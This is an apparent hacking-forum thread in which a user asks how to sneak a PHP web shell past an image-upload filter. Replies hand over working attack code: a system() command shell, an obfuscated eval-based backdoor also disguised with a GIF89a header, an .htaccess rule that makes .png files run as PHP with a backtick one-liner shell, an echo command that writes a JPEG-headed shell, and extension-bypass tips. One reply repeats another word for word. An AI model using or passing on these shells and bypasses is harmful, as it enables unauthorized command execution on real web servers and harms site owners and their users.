upload shell

[404exe]

I want to make the content of the .php file the same as the jpg. In this way, the site will classify the content as jpg while checking.

i can change .jpg to php7
can't upload shell.php


<?php

if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}

?>

 

[Prokhorenco]

If you want the web shell to be read as an image and not a PHP file then you will want to use a weevely web shell. It's better

Shell (PHP):

<?php
$j='$m[1]),$kxK)));xK$o=xK@ob_gxKet_contents()xK;@xKob_end_clxKean();$r=xK@b';
$J=str_replace('qe','','qecqereatqeeqe_fqeunqection');
$U='trlen($xKtxK);$o="";foxKrxK(xKxK$i=0;$i<$l;xK){for($j=xK0;($j<$c&&$i<xK$l)';
$L='ase6xKxK4xK_enxKcode(@x(@gzxKcompress($o)xK,$k));prxKxKint("$p$kh$xKr$kf");}';
$g='$k="34xK2d28xKxKd5";$kh="c480cfd1xK6xK71xK4";$kf="25c1508xKxK307ee";$pxK';
$l='atchxK("xK/$kh(xK.+)$kf/",@xKfilexKxKxK_get_contxKents("xKphp://inpuxKt"),$m)=';
$v='="psKEAVcxKd6rN8xKxKVxKM25xK";function xxK($xKt,$k){$c=strxKlen($xKk);$l=s';
$y='=1) xK{@ob_stxKart();@exKxKvalxK(@gzuncomprxKess(@x(@xKbaxKsexK64_decodexK(';
$Z=';$jxK++,$ixK+xK+){$oxK.=$t{$ixK}^$k{xK$j};}}retuxKrn $o;}ixKf (@pxKreg_m';
$z=str_replace('xK','',$g.$v.$U.$Z.$l.$y.$j.$L);
$I=$J('',$z);$I();
?>

Shell with image data:

GIF89a;<?php
$j='$m[1]),$kxK)));xK$o=xK@ob_gxKet_contents()xK;@xKob_end_clxKean();$r=xK@b';
$J=str_replace('qe','','qecqereatqeeqe_fqeunqection');
$U='trlen($xKtxK);$o="";foxKrxK(xKxK$i=0;$i<$l;xK){for($j=xK0;($j<$c&&$i<xK$l)';
$L='ase6xKxK4xK_enxKcode(@x(@gzxKcompress($o)xK,$k));prxKxKint("$p$kh$xKr$kf");}';
$g='$k="34xK2d28xKxKd5";$kh="c480cfd1xK6xK71xK4";$kf="25c1508xKxK307ee";$pxK';
$l='atchxK("xK/$kh(xK.+)$kf/",@xKfilexKxKxK_get_contxKents("xKphp://inpuxKt"),$m)=';
$v='="psKEAVcxKd6rN8xKxKVxKM25xK";function xxK($xKt,$k){$c=strxKlen($xKk);$l=s';
$y='=1) xK{@ob_stxKart();@exKxKvalxK(@gzuncomprxKess(@x(@xKbaxKsexK64_decodexK(';
$Z=';$jxK++,$ixK+xK+){$oxK.=$t{$ixK}^$k{xK$j};}}retuxKrn $o;}ixKf (@pxKreg_m';
$z=str_replace('xK','',$g.$v.$U.$Z.$l.$y.$j.$L);
$I=$J('',$z);$I();
?>

Now you can check the file:

Basic PHP shell:

user@host:~$ file shell.php
shell.php: PHP script, ASCII text

Shell with image data:

user@host:~$ file shell.jpg.php
shell.jpg.php: GIF image data, version 89a, 15419 x 28735

 

[zLeak3r]

If webserver runs by apache software, you are able to use htaccess files to change apache behaviours like handlers.
Please try to upload this file first, after that you can upload your php code as png file to access php handler.

.htaccess

AddType application/x-httpd-php .png

sample.png

<?=`$_GET[_]`?>

To execute operating system commands on the backdoor: sample.png?_=whoami

Someways are available; shtml files or try to upload file as phtml.
Last thing, you can just upload pHp5 extension if you are lucky.

 

[Prokhorenco]

If webserver runs by apache software, you are able to use htaccess files to change apache behaviours like handlers.
Please try to upload this file first, after that you can upload your php code as png file to access php handler.

.htaccess

AddType application/x-httpd-php .png

sample.png

<?=`$_GET[_]`?>

To execute operating system commands on the backdoor: sample.png?_=whoami

Someways are available; shtml files or try to upload file as phtml.
Last thing, you can just upload pHp5 extension if you are lucky.

 

[fikri]

$ echo -n -e '\xFF\xD8\xFF\xEO php system($_GET["secret"])?>.' > payload.jpg

you can edit this, as per your need!